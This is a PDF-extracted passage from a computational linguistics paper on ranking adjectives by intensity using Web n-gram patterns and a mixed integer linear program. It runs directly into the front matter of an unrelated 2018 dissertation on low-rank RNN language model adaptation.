divide-and-conquer approaches, where adjectives are scored with respect to selected pivot words, and hence many adjectives that lack pairwise evidence with the pivots are not properly classified, although they may have order evidence with some third adjective that could help establish the ranking. Optional synonymy information can further help, as shown in Figure 2. Moreover, our MILP also gives higher weight to pairs with higher scores, which is useful when breaking global constraint cycles as in the simple example in Figure 1. If we need to break a con- straint violating triangle or cycle, we would have to make arbitrary choices if we were ranking based on sgn(score(a,b)) alone. Instead, we can choose a better ranking based on the magnitude of the pair- wise scores. A stronger score between an adjective pair doesn’t necessarily mean that they should be further apart in the ranking. It means that these two words are attested together on the Web with respect to the intensity patterns more than with other candi- date words. Therefore, we try to respect the order of such word pairs more in the final ranking when we are breaking constraint-violating cycles. 3 Related Work Hatzivassiloglou and McKeown (1993) presented the first step towards automatic identification of ad- jective scales, thoroughly discussing the background of adjective semantics and a means of discovering clusters of adjectives that belong on the same scale, thus providing one way of creating the input for our ranking algorithm. Inkpen and Hirst (2006) study near-synonyms and nuances of meaning differentiation (such as stylistic, attitudinal, etc.). They attempt to automatically ac- quire a knowledge base of near-synonym differences via an unsupervised decision-list algorithm. How- ever, their method depends on a special dictionary of synonym differences to learn the extraction pat- terns, while we use only a raw Web-scale corpus. Mohammad et al. (2013) proposed a method of identifying whether two adjectives are antonymous. This problem is related but distinct, because the de- gree of antonymy does not necessarily determine their position on an intensity scale. Antonyms (e.g., little, big) are not necessarily on the extreme ends of scales. Sheinman and Tokunaga (2009) and Sheinman et al. (2012) present the most closely related previous work on adjective intensities. They collect lexico- semantic patterns via bootstrapping from seed adjec- tive pairs to obtain pairwise intensities, albeit using search engine ‘hits’, which are unstable and prob- lematic (Kilgarriff, 2007). While their approach is primarily evaluated in terms of a local pairwise classification task, they also suggest the possibil- ity of ordering adjectives on a scale using a pivot- based partitioning approach. Although intuitive in theory, the extracted pairwise scores are frequently too sparse for this to work. Thus, many adjec- tives have no score with a particular headword. In our experiments, we reimplemented this approach and show that our MILP method improves over it by allowing individual pairwise decisions to benefit more from global information. Schulam and Fell- baum (2010) apply the approach of Sheinman and Tokunaga (2009) to German adjectives. Our method extends easily to various foreign languages as de- scribed in Section 5. Another related task is the extraction of lexico- syntactic and lexico-semantic intensity-order pat- terns from large text corpora (Hearst, 1992; Chklovski and Pantel, 2004; Tandon and de Melo, 2010). Sheinman and Tokunaga (2009) follows Davidov and Rappoport (2008) to automatically bootstrap adjective scaling patterns using seed ad- jectives and Web hits. These methods thus can be used to provide the input patterns for our algorithm. VerbOcean by Chklovski and Pantel (2004) ex- tracts various fine-grained semantic relations (in- cluding the stronger-than relation) between pairs of verbs, using lexico-syntactic patterns over the Web. 283 Our approach of jointly ranking a set of words using pairwise evidence is also applicable to the VerbO- cean pairs, and should help address similar sparsity issues of local pairwise decisions. Such scales will again be quite useful for language learners and lan- guage understanding tools. de Marneffe et al. (2010) infer yes-or-no answers to questions with responses involving scalar adjec- tives in a dialogue corpus. They correlate adjectives with ratings in a movie review corpus to find that good appears in lower-rated reviews than excellent. Finally, there has been a lot of work on measuring the general sentiment polarity of words (Hatzivas- siloglou and McKeown, 1997; Hatzivassiloglou and Wiebe, 2000; Turney and Littman, 2003; Liu and Seneff, 2009; Taboada et al., 2011; Yessenalina and Cardie, 2011; Pang and Lee, 2008). Our work in- stead aims at producing a large, unrestricted number of individual intensity scales for different qualities and hence can help in fine-grained sentiment analy- sis with respect to very particular content aspects. 4 Experiments 4.1 Data Input Clusters In order to obtain input clusters for evaluation, we started out with the satellite cluster or ‘dumbbell’ structure of adjectives in WordNet 3.0, which consists of two direct antonyms as the poles and a number of other satellite adjectives that are se- mantically similar to each of the poles (Gross and Miller, 1990). For each antonymy pair, we deter- mined an extended dumbbell set by looking up syn- onyms and words in related (satellite adjective and ‘see-also’) synonym sets. We cut such an extended dumbbell into two antonymous halves and treated each of these halves as a potential input adjective cluster. Most of these WordNet clusters are noisy for the purpose of our task, i.e. they contain adjectives that appear unrelatable on a single scale due to polysemy and semantic drift, e.g. violent with respect to super- natural and affected. Motivated by Sheinman and Tokunaga (2009), we split such hard-to-relate ad- jectives into smaller scale-specific subgroups using the corpus evidence4. For this, we consider an undi- 4Note that we do not use the WordNet dataset of Sheinman and Tokunaga (2009) for evaluation, as it does not provide full 438 115 60 35 19 12 14 5 4 3 0 100 200 300 400 500 2 3 4 5 6 7 8 9 10-14 15-17 # of c ha in s Length of chain Figure 3: The histogram of cluster sizes after partitioning. 41 27 12 3 3 2 0 10 20 30 40 50 3 4 5 6 7 8 # of c ha in s Length of chain Figure 4: The histogram of cluster sizes in the test set. rected edge between each pair of adjectives that has a non-zero intensity score (based on the Web-scale scoring procedure described in Section 2.1.3). The resulting graph is then partitioned into connected components such that any adjectives in a subgraph are at least indirectly connected via some path and thus much more likely to belong to the same inten- sity scale. While this does break up partitions when- ever there is no corpus evidence connecting them, ordering the adjectives within each such partition re- mains a challenging task. This is because the Web evidence will still not necessarily directly relate all adjectives (in a partition) to each other. Addition- ally, the Web evidence may still indicate the wrong direction. Figure 3 shows the size distribution of the resulting partitions. Patterns To construct our intensity pattern set, we started with a couple of common rankable adjective seed pairs such as (good, great) and (hot, boiling) and used the Web-scale n-grams corpus (Brants and Franz, 2006) to collect the few most frequent pat- terns between and around these seed-pairs (in both directions). Among these, we manually chose a scales. Instead, their annotators only made pairwise compar- isons with select words, using a 5-way classification scheme (neutral, mild, very mild, intense, very intense). 284 small set of intuitive patterns that are linguistically useful for ordering adjectives, several of which had not been discovered in previous work. These are shown in Table 1. Note that we only collected pat- terns that were not ambiguous in the two orders, for example the pattern ’? , not ?’ is ambiguous be- cause it can be used as both ’good, not great’ and ’great, not good’. Alternatively, one can easily also use fully-automatic bootstrapping techniques based on seed word pairs (Hearst, 1992; Chklovski and Pantel, 2004; Yang and Su, 2007; Turney, 2008; Davidov and Rappoport, 2008). However, our semi- automatic approach is a simple and fast process that extracts a small set of high-quality and very gen- eral adjective-scaling patterns. This process can quickly be repeated from scratch in any other lan- guage. Moreover, as described in Section 5.1, the English patterns can also be projected automatically to patterns in other languages. Development and Test Sets Section 2.1 describes the method for collecting the intensity scores for ad- jective pairs, using Web-scale n-grams (Brants and Franz, 2006). We relied on a small development set to test the MILP structure and the pairwise score setup. For this, we manually chose 5 representative adjective clusters from the full set of clusters. The final test set, distinct from this development set, consists of 569 word pairs in 88 clusters, each annotated by two native speakers of English. Both the gold test data (and our code) are freely avail- able.5 To arrive at this data, we randomly drew 30 clusters each for cluster sizes 3, 4, and 5+ from the histogram of partitioned adjective clusters in Fig- ure 3. While labeling a cluster, annotators could ex- clude words that they deemed unsuitable to fit on a single shared intensity scale with the rest of the cluster. Fortunately, the partitioning described ear- lier had already separated most such cases into dis- tinct clusters. The annotators ordered the remaining words on a scale. Words that seemed indistinguish- able in strength could share positions in their anno- tation. As our goal is to compare scale formation algo- rithms, we did not include trivial clusters of size 2. On such trivial clusters, the Web evidence alone de- termines the output and hence all algorithms, includ- 5http://demelo.org/gdm/intensity/ ing the baseline, obtain the same pairwise accuracy (defined below) of 93.3% on a separate set of 30 ran- dom clusters of size 2. Figure 4 shows the distribution of cluster sizes in our main gold set. The inter-annotator agreement in terms of Cohen’s κ (Cohen, 1960) on the pairwise classification task with 3 labels (weaker, stronger, or equal/unknown) was 0.64. In terms of pairwise accuracy, the agreement was 78.0%. 4.2 Metrics In order to thoroughly evaluate the performance of our adjective ordering procedure, we rely on both pairwise and ranking-correlation evaluation metrics. Consider a set of input words A = {a1,a2, . . . ,an} and two rankings for this set – a gold-standard rank- ing rG(A) and a predicted ranking rP (A). 4.2.1 Pairwise Accuracy For a pair of words ai, aj, we may consider the classification task of choosing one of three labels (<, >, =?) for the case of ai being weaker, stronger, and equal (or unknown) in intensity, respectively, com- pared to a2: L(a1,a2) =    < if r(ai) < r(aj) > if r(ai) > r(aj) =? if r(ai) = r(aj) For each pair (a1,a2), we compute gold-standard labels LG(a1,a2) and predicted labels LP (a1,a2) as above, and then the pairwise accuracy PW(A) for a particular ordering on A is simply the fraction of pairs that are correctly classified, i.e. for which the predicted label is same as the gold-standard label: PW(A) = ∑ i<j 1{LG(ai,aj) = LP (ai,aj)} ∑ i<j 1 4.2.2 Ranking Correlation Coefficients Our second type of evaluation assesses the rank correlation between two ranking permutations (gold-standard and predicted). Many studies use Kendall’s tau (Kendall, 1938), which measures the total number of pairwise inversions, while others prefer Spearman’s rho (Spearman, 1904), which measures the L1 distance between ranks. 285 Kendall’s tau correlation coefficient We use the τb version of Kendall’s correlation metric, as it in- corporates a correction for ties (Kruskal, 1958; Dou et al., 2008): τb = P −Q√ (P + Q + X0) · (P + Q + Y0) where P is the number of concordant pairs, Q is the number of discordant pairs, X0 is the number of pairs tied in the first ranking, Y0 is the number of pairs tied in the second ranking. Given the two rank- ings of an adjective set A, the gold-standard ranking rG(A) and the predicted ranking rP (A), two words ai, aj are: • concordant iff both rankings have the same strict order of the two elements, i.e., rG(ai) > rG(aj) and rP (ai) > rP (aj), or rG(ai) < rG(aj) and rP (ai) < rP (aj). • discordant iff the two rankings have an inverted strict order of the two elements, i.e., rG(ai) > rG(aj) and rP (ai) < rP (aj), or rG(ai) < rG(aj) and rP (ai) > rP (aj). • tied iff rG(ai) = rG(aj) or rP (ai) = rP (aj). Spearman’s rho correlation coefficient For two n-sized ranked lists {xi} and {yi}, the Spearman correlation coefficient is defined as the Pearson cor- relation coefficient between the ranks of variables: ρ = ∑ i (xi − x̄) · (yi − ȳ) √∑ i (xi − x̄)2 · ∑ i (yi − ȳ)2 Here, x̄ and ȳ denote the means of the values in the respective lists. We use the standard procedure for handling ties correctly. Tied values are assigned the average of all ranks of items sharing the same value in the ranked list sorted in ascending order of the values. Handling Inversions While annotating, we some- times observed that the ordering itself was very clear but the annotators disagreed about which end of a particular scale was to count as the strong one, e.g. when transitioning from soft to hard or from alpha to beta. We thus also report average absolute values of both correlation coefficients, as these properly ac- count for anticorrelations. Our test set only contains clusters of size 3 or larger, so there is no need to account for inversions in clusters of size 2. 4.3 Results In Table 3, we use the evaluation metrics mentioned above to compare several different approaches. Web Baseline The first baseline simply reflects the original pairwise Web-based intensity scores. We classify (with one of 3 labels) a given pair of adjectives using the Web-based intensity scores (as described in Section 2.1.3) as follows: Lbaseline(a1,a2) =    < if score(ai,aj) > 0 > if score(ai,aj) < 0 =? if score(ai,aj) = 0 Since score(ai,aj) represents the weak-strong score of the two adjectives, a more positive value means a higher likelihood of ai being weaker (<, on the left) in intensity than aj. In Table 3, we observe that the (micro-averaged) pairwise accuracy, as defined earlier, for the origi- nal Web baseline is 48.2%, while the ranking mea- sures are undefined because the individual pairs do not lead to a coherent scale. Divide-and-Conquer The divide-and-conquer baseline recursively splits a set of words into three subgroups, placed to the left (weaker), on the same position (no evidence), or to the right (stronger) of a given randomly chosen pivot word. While this approach shows only a minor improve- ment in terms of the pairwise accuracy (50.6%), its main benefit is that one obtains well-defined inten- sity scales rather than just a collection of pairwise scores. Sheinman and Tokunaga The approach by Sheinman and Tokunaga (2009) involves a simi- lar divide-and-conquer based partitioning in the first phase, except that their method makes use of syn- onymy information from WordNet and uses all syn- onyms in WordNet’s synset for the headword as neutral pivot elements (if the headword is not in WordNet, then the word with the maximal unigram frequency is chosen). In the second phase, their method performs pairwise comparisons within the more intense and less intense subgroups. We reim- plement their approach here, using the Google N- Grams dataset instead of online Web search engine hits. We observe a small improvement over the Web baseline in terms of pairwise accuracy. Note that the 286 Method Pairwise Accuracy Avg. τ Avg. |τ| Avg. ρ Avg. |ρ| Web Baseline 48.2% N/A N/A N/A N/A Divide-and-Conquer 50.6% 0.45 0.53 0.52 0.62 Sheinman and Tokunaga (2009) 55.5% N/A N/A N/A N/A MILP 69.6% 0.57 0.65 0.64 0.73 MILP with synonymy 78.2% 0.57 0.66 0.67 0.80 Inter-Annotator Agreement 78.0% 0.67 0.76 0.75 0.86 Table 3: Main test results Predicted Class Weaker Tie Stronger True Class Weaker 117 127 15 Tie 5 42 15 Stronger 11 122 115 Table 4: Confusion matrix (Web baseline) rank correlation measure scores are undefined for their approach. This is because in some cases their method placed all words on the same position in the scale, which these measures cannot handle even in their tie-corrected versions. Overall, the Sheinman and Tokunaga approach does not aggregate informa- tion sufficiently well at the global level and often fails to make use of transitive inference. MILP Our MILP exploits the same pairwise scores to induce significantly more accurate pair- wise labels with 69.6% accuracy, a 41% relative error reduction over the Web baseline, 38% over Divide-and-Conquer, and 32% over Sheinman and Tokunaga (2009). We further see that our MILP method is able to exploit external synonymy (equiv- alence) information (using synonyms marked by the annotators). The accuracy of the pairwise scores as well as the quality of the overall ranking increase even further to 78.2%, approaching the human inter- annotator agreement. In terms of average correlation coefficients, we observe similar improvement trends from the MILP, but of different magnitudes, because these averages give small clusters the same weight as larger ones. 4.4 Analysis Confusion Matrices For a given approach, we can study the confusion matrix obtained by cross- tabulating the gold classification with the predicted Predicted Class Weaker Tie Stronger True Class Weaker 177 29 53 Tie 9 24 29 Stronger 15 38 195 Table 5: Confusion matrix (MILP) classification of every unique pair of adjectives in the ground truth data. Table 4 shows the confusion matrix for the Web baseline. We observe that due to the sparsity of pairwise intensity order evidence, the baseline method predicts too many ties. Table 5 provides the confusion matrix for the MILP (without external equivalence information) for comparison. Although the middle column still shows that the MILP predicts more ties than humans annotators, we find that a clear majority of all unique pairs are now correctly placed along the diagonal. This confirms that our MILP successfully infers new ordering decisions, although it uses the same input (corpus evidence) as the baseline. The remaining ties are mostly just the result of pairs for which there simply is no evidence at all in the input Web counts. Note that this problem could for instance be circum- vented by relying on a crowdsourcing approach: A few dispersed tie-breakers are enough to allow our MILP to correct many other predictions. Predicted Examples Finally, in Table 6, we pro- vide a selection of real results obtained by our algo- rithm. For instance, it correctly inferred that terri- fying is more intense than creepy or scary, although the Web pattern counts did not provide any explicit information about these words pairs. In some cases, however, the Web evidence did not suffice to draw the right conclusions, or it was misleading due to is- sues like polysemy (as for the word funny). 287 Accuracy Prediction Gold Standard Good hard < painful < hopeless hard < painful < hopeless full < stuffed < (overflowing, overloaded) full < stuffed < overflowing < overloaded unusual < uncommon < rare < exceptional < extraordinary uncommon < unusual < rare < extraordinary < exceptional Average creepy < scary < sinister < frightening < terrifying creepy < (scary, frightening) < terrifying < sinister Bad (awake, conscious) < alive < aware alive < awake < (aware, conscious) strange < (unusual, weird) < (funny, eerie) (strange, funny) < unusual < weird < eerie Table 6: Some examples (of bad, average and good accu- racy) of our MILP predictions (without synonymy infor- mation) and the corresponding gold-standard annotation. While we show results on gold-standard chains here for evaluation purposes, in practice one can also recombine two [0, 1] chains for a pair of antonymic clusters to form a single scale from [−1, 1] that visu- alizes the full spectrum of available adjectives along a dimension, from adjacent all the way to removed, or from black to glaring. 5 Extension to Multilingual Ordering Our method for globally ordering words on a scale can easily be applied to languages other than En- glish. The entire process is language-independent as long as the required resources are available and a small number of patterns are chosen. For morpho- logically rich languages, the information extraction step of course may require additional morphologi- cal analysis tools for stemming and aggregating fre- quencies across different forms. Alternatively, a cross-lingual projection approach is possible at multiple levels, utilizing information from the English data and ranking. As the first step, the set of words in the target language that we wish to rank can be projected from the English word set if necessary – e.g., as shown in de Melo and Weikum (2009). Next, we outline two projection methods for the ordering step. The first method is based on pro- jection of the English intensity-ordering patterns to the new language, and then using the same MILP as described in Section 2.2. In the second method, we also change the MILP and add cross-lingual con- straints to better inform the target language’s ad- jective ranking. A detailed empirical evaluation of these approaches remains future work. 5.1 Cross-Lingual Pattern Projection Instead of creating new patterns, in many cases we obtain quite adequate intensity patterns by us- ing cross-lingual projection. We simply take sev- eral adjective pairs, instantiate the English patterns with them, and obtain new patterns using a machine translation system. Filling the wildcards in a pat- tern, say ‘? but not ?’, with good/excellent results in ‘good but not excellent’. This phrase is then trans- lated into the target language using the translation system, say into German ‘gut aber nicht ausgezeich- net’. Finally, put back the wildcards in the place of the translations of the adjective words, here gut and ausgezeichnet, to get the corresponding German pat- tern ‘? aber nicht ?’. Table 7 shows various German intensity patterns that we obtain by projecting from the English patterns as described. The process is re- peated with multiple adjective pairs in case different variants are returned, e.g. due to morphology. Most of these translations deliver useful results. Now that we have the target language adjectives and the ranking patterns, we can compute the pair- wise intensity scores using large-scale data in that language. We can use the Google n-grams cor- pora for 10 European languages (Brants and Franz, 2009), and also for Chinese (LDC2010T02) and Japanese (LDC2009T08). For other languages, one can use available large raw-text corpora or Web crawling tools. 5.2 Crosslingual MILP To improve the rankings for lesser-resourced lan- guages, we can further use a joint MILP approach for the new language we want to transfer this pro- cess to. Additional constraints between the English 288 Weak-Strong Patterns Strong-Weak Patterns English German English German ? but not ? ? aber nicht ? not ? just ? nicht ? gerade ? ? if not ? ? wenn nicht ? not ? but just ? nicht ? aber nur ? ? and almost ? ? und fast ? not ? though still ? nicht ? aber immer noch ? not just ? but ? nicht nur ? sondern ? ? or very ? ? oder sehr ? Table 7: Examples of German intensity patterns projected (translated) directly from the English patterns. words and their corresponding target language trans- lations, in combination with the English ranking in- formation, allow the algorithm to obtain better rank- ings for the target words whenever the non-English target language corpus does not provide sufficient intensity order evidence. In this case, the input set A contains words in multiple languages. The Web intensity scores score(ai,aj) should be set to zero when comparing words across languages. We instead link them using a translation table T ⊆ {1, . . . ,N} × {1, . . . ,N} from a translation dictionary or phrase table. Here, (i,j) ∈ T signifies that ai is a translation of aj. We do not require a bijective relationship between them (i.e., translations needn’t be unique). The objective function is augmented by adding the new term ∑ (i,j)∈T (w′ij + s ′ ij)CT (5) for a constant CT > 0 that determines how much weight we assign to translations as opposed to the corpus count scores. The MILP is extended by adding the following extra constraints. dij −w′ijCT < −dmax ∀i,j ∈{1, . . . ,N} dij + (1 −w′ij)CT ≥−dmax ∀i,j ∈{1, . . . ,N} dij + s ′ ijCT > dmax ∀i,j ∈{1, . . . ,N} dij − (1 −s′ij)CT ≤ dmax ∀i,j ∈{1, . . . ,N} w′ij ∈{0, 1} ∀i,j ∈ T s′ij ∈{0, 1} ∀i,j ∈ T The variables di,j, as before, encode distances be- tween positions of words on the scale, but now also include cross-lingual pairs of words in different lan- guages. The new constraints encourage translational equivalents to remain close to each other, preferably within a desired (but not strictly enforced) maximum distance dmax. The new variables w′ij, s ′ ij are sim- ilar to wij, sij in the standard MILP. However, the w′ij become 1 if and only if dij ≥−dmax and the s′ij become 1 if and only if dij ≤ dmax. If both w′ij and s′ij are 1, then the two words have a small distance −dmax ≤ dij ≤ dmax. The augmented objective function explicitly encourages this for translational equivalents. Overall, this approach thus allows evi- dence from a language with more Web evidence to improve the process of adjective ordering in lesser- resourced languages. 6 Conclusion In this work, we have presented an approach to the challenging and little-studied task of ranking words in terms of their intensity on a continuous scale. We address the issue of sparsity of the intensity order ev- idence in two ways. First, pairwise intensity scores are computed using linguistically intuitive patterns in a very large, Web-scale corpus. Next, a Mixed Integer Linear Program (MILP) expands on this fur- ther by inferring new relative relationships. Instead of making ordering decisions about word pairs in- dependently, our MILP considers the joint decision space and factors in e.g. how two adjectives relate to some third adjective, thus enforcing global con- straints such as transitivity. Our approach is general enough to allow addi- tional evidence such as synonymy in the MILP, and can straightforwardly be applied to other word classes (such as verbs), and to other languages (monolingually as well as cross-lingually). The overall results across multiple metrics are substan- tially better than previous approaches, and fairly close to human agreement on this challenging task. Acknowledgments We would like to thank the editor and the anony- mous reviewers for their helpful feedback. 289 References Mohit Bansal and Dan Klein. 2011. Web-scale features for full-scale parsing. In Proceedings of ACL 2011. Thorsten Brants and Alex Franz. 2006. The Google Web 1T 5-gram corpus version 1.1. LDC2006T13. Thorsten Brants and Alex Franz. 2009. Web 1T 5-gram, 10 European languages, version 1. LDC2009T25. Timothy Chklovski and Patrick Pantel. 2004. VerbO- cean: Mining the web for fine-grained semantic verb relations. In Proceedings of EMNLP 2004. Jacob Cohen. 1960. A coefficient of agreement for nom- inal scales. Educational and Psychological Measure- ment, 20(1):37–46. Dmitry Davidov and Ari Rappoport. 2008. Unsuper- vised discovery of generic relationships using pattern clusters and its evaluation by automatically generated sat analogy questions. In Proceedings of ACL 2008. Marie-Catherine de Marneffe, Christopher D. Manning, and Christopher Potts. 2010. Was it good? it was provocative. learning the meaning of scalar adjectives. In Proceedings of ACL 2010. Gerard de Melo and Gerhard Weikum. 2009. Towards a universal wordnet by learning from combined evi- dence. In Proceedings of CIKM 2009. Zhicheng Dou, Ruihua Song, Xiaojie Yuan, and Ji-Rong Wen. 2008. Are click-through data adequate for learn- ing web search rankings? In Proc. of CIKM 2008. Derek Gross and Katherine J. Miller. 1990. Adjectives in WordNet. International Journal of Lexicography, 3(4):265–277. Vasileios Hatzivassiloglou and Kathleen R. McKeown. 1993. Towards the automatic identification of adjecti- val scales: Clustering adjectives according to meaning. In Proceedings of ACL 1993. Vasileios Hatzivassiloglou and Kathleen R. McKeown. 1997. Predicting the semantic orientation of adjec- tives. In Proceedings of ACL 1997. Vasileios Hatzivassiloglou and Janyce M. Wiebe. 2000. Effects of adjective orientation and gradability on sen- tence subjectivity. In Proceedings of COLING 2000. Marti Hearst. 1992. Automatic acquisition of hyponyms from large text corpora. In Proceedings of COLING 1992. Diana Inkpen and Graeme Hirst. 2006. Building and using a lexical knowledge base of near-synonym dif- ferences. Computational Linguistics, 32(2):223–262. Maurice G. Kendall. 1938. A new measure of rank cor- relation. Biometrika, 30(1/2):81–93. Adam Kilgarriff. 2007. Googleology is bad science. Computational Linguistics, 33(1). William H. Kruskal. 1958. Ordinal measures of associa- tion. Journal of the American Statistical Association, 53(284):814–861. Jingjing Liu and Stephanie Seneff. 2009. Review senti- ment scoring via a parse-and-paraphrase paradigm. In Proceedings of EMNLP 2009. George A. Miller. 1995. WordNet: A lexical database for english. Communications of the ACM, 38(11):39–41. Said M. Mohammad, Bonnie J. Dorr, Graeme Hirst, and Peter D. Turney. 2013. Computing lexical contrast. Computational Linguistics. Bo Pang and Lillian Lee. 2008. Opinion mining and sentiment analysis. Foundations and Trends in Infor- mation Retrieval, 2(1-2):1–135, January. Peter F. Schulam and Christiane Fellbaum. 2010. Au- tomatically determining the semantic gradation of ger- man adjectives. In Proceedings of KONVENS 2010. Vera Sheinman and Takenobu Tokunaga. 2009. AdjS- cales: Visualizing differences between adjectives for language learners. IEICE Transactions on Information and Systems, 92(8):1542–1550. Vera Sheinman, Takenobu Tokunaga, I. Julien, P. Schu- lam, and C. Fellbaum. 2012. Refining WordNet adjec- tive dumbbells using intensity relations. In Proceed- ings of Global WordNet Conference 2012. Rion Snow, Daniel Jurafsky, and Andrew Y. Ng. 2006. Semantic taxonomy induction from heterogenous evi- dence. In Proceedings of COLING/ACL 2006. Charles Spearman. 1904. The proof and measurement of association between two things. The American journal of psychology, 15(1):72–101. Fabian M. Suchanek, Mauro Sozio, and Gerhard Weikum. 2009. SOFIE: a self-organizing framework for information extraction. In Proceedings of WWW 2009. Maite Taboada, Julian Brooke, Milan Tofiloskiy, and Kimberly Vollz. 2011. Lexicon-based methods for sentiment analysis. Computational Linguistics. Niket Tandon and Gerard de Melo. 2010. Information extraction from web-scale n-gram data. In Proceed- ings of the SIGIR 2010 Web N-gram Workshop. Peter D. Turney and Michael L. Littman. 2003. Mea- suring praise and criticism: Inference of semantic orientation from association. ACM Trans. Inf. Syst., 21(4):315–346, October. Peter D. Turney. 2008. A uniform approach to analogies, synonyms, antonyms, and associations. In Proceed- ings of COLING 2008. Xiaofeng Yang and Jian Su. 2007. Coreference resolu- tion using semantic relatedness information from auto- matically discovered patterns. In Proceedings of ACL 2007. Ainur Yessenalina and Claire Cardie. 2011. Composi- tional matrix-space models for sentiment analysis. In Proceedings of EMNLP 2011. 290 work_fkn6grwf7be5hmmu5cqetl6dzm ---- c©Copyright 2018 Aaron Jaech Low-Rank RNN Adaptation for Context-Aware Language Modeling Aaron Jaech A dissertation submitted in partial fulfillment of the requirements for the degree of Doctor of Philosophy University of Washington 2018 Reading Committee: Mari Ostendorf, Chair Hannaneh Hajishirzi Noah Smith Program Authorized to Offer Degree: Electrical Engineering University of Washington Abstract Low-Rank RNN Adaptation for Context-Aware Language Modeling Aaron Jaech Chair of the Supervisory Committee: Professor Mari Ostendorf Electrical Engineering A long-standing weakness of statistical language models is that their performance drastically degrades if they are used on data that varies even slightly from the data on which they were trained. In practice, applications require the use of adaptation methods to adjust the predictions of the model to match the local context. For instance, in a speech recognition application, a single static language model would not be able to handle all the different ways that people speak to their voice assistants such as selecting music and sending a message to a friend. An adapted model would make its predictions conditioned on the knowledge of who is speaking and what task they are trying to do. The current standard approach to recurrent neural network language model adaptation is to apply a simple linear shift to the recurrent and/or output layer bias vector. Although this is helpful, it does not go far enough. This thesis introduces a new approach to adaptation, which we call the FactorCell, that generates a custom recurrent network for each context by applying a low-rank transformation. The FactorCell allows for a more substantial change to the recurrent layer weights. Different from previous approaches, the introduction of a rank hyperparameter gives control over how different or similar the adapted models should be. In our experiments on several different datasets and multiple types of context, the in- creased adaptation of the recurrent layer is always helpful, as measured by perplexity, the standard for evaluating language models. We also demonstrate impact on two applica- tions: personalized query completion and context-specific text generation, finding that the enhanced adaptation benefits both. We also show that the FactorCell provides a more ef- fective text classification model, but more importantly the classification results reveal that there are important differences between the models that are not captured by perplexity. The classification metric is particularly important for the text generation application. TABLE OF CONTENTS Page List of Figures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . iii List of Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v Chapter 1: Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.2 Key Contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 1.3 Thesis Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Chapter 2: Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 2.1 General Language Modeling Background . . . . . . . . . . . . . . . . . . . . 9 2.2 Neural Language Modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 2.3 Language Model Adaptation . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 Chapter 3: Exploring Context-Aware RNNs . . . . . . . . . . . . . . . . . . . . . 21 3.1 Additive Bias Adaptation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 3.2 Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 3.3 Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 3.4 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 3.5 Comparison to Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . 37 3.6 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 Chapter 4: Factor Cell Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 4.1 FactorCell Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 4.2 Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42 4.3 Experiments with Different Contexts . . . . . . . . . . . . . . . . . . . . . . 44 4.4 Analysis for Sparse Contexts . . . . . . . . . . . . . . . . . . . . . . . . . . . 54 i 4.5 Comparison to Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . 58 4.6 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 Chapter 5: Personalized Query Auto-Completion . . . . . . . . . . . . . . . . . . . 61 5.1 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61 5.2 Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 5.3 Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 5.4 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 5.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 Chapter 6: Context-Specific Text Generation . . . . . . . . . . . . . . . . . . . . . 73 6.1 Text Generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74 6.2 Illustrative Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75 6.3 Experiments and Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77 6.4 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 Chapter 7: Conclusions and Future Directions . . . . . . . . . . . . . . . . . . . . 85 7.1 Summary of Contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 7.2 Future Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 Appendix A: Sparse Corrections for Output Layer Adaptation . . . . . . . . . . . . 105 A.1 Sparse plus low-rank softmax bias adaptation . . . . . . . . . . . . . . . . . 105 A.2 L1 Penalty for Bias Layer Fine-Tuning . . . . . . . . . . . . . . . . . . . . . 108 A.3 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 ii LIST OF FIGURES Figure Number Page 1.1 Usage of the terms “Black Friday” and “Super Bowl” on Reddit during an eight year time period. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 2.1 Vocabulary size in large vocabulary continuous speech recognition systems over time. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 3.1 The value of the dimension of the LSTM hidden state in an unadapted model that is the strongest indicator for Spanish text for three different code-switched Tweets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 4.1 Illustration of the FactorCell architecture. . . . . . . . . . . . . . . . . . . . 41 4.2 Accuracy vs. perplexity for different classes of models on the four word-based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 4.3 Log likelihood ratio between a model that assumes a 5 star review and the same 